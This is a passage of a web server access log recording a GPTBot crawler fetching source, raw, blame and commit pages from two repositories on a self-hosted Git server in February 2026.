"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" +[17/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 13008] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" +[17/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 11349] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12792] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11526] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11652] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" +[17/Feb/2026:13:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 74.7.227.38] [Length 10365] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 13284] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" +[17/Feb/2026:13:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" +[17/Feb/2026:13:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 74.7.227.38] [Length 10607] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" +[17/Feb/2026:13:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 10982] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" +[17/Feb/2026:13:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" +[17/Feb/2026:13:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12483] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" +[17/Feb/2026:13:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" +[17/Feb/2026:13:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" +[17/Feb/2026:13:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" +[17/Feb/2026:13:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" +[17/Feb/2026:13:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" +[17/Feb/2026:13:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" +[17/Feb/2026:13:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13912] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" +[17/Feb/2026:13:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11888] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11306] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 10953] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" +[17/Feb/2026:13:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata" [Client 74.7.227.38] [Length 64188] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 188144] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11212] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:13:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:13:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10383] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:13:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:13:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues/new" +[17/Feb/2026:13:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26287] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" +[17/Feb/2026:13:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/halfweekly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10862] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" +[17/Feb/2026:13:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 18816] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" +[17/Feb/2026:13:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 12479] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" +[17/Feb/2026:13:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/quarterly" [Client 74.7.227.38] [Length 8582] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 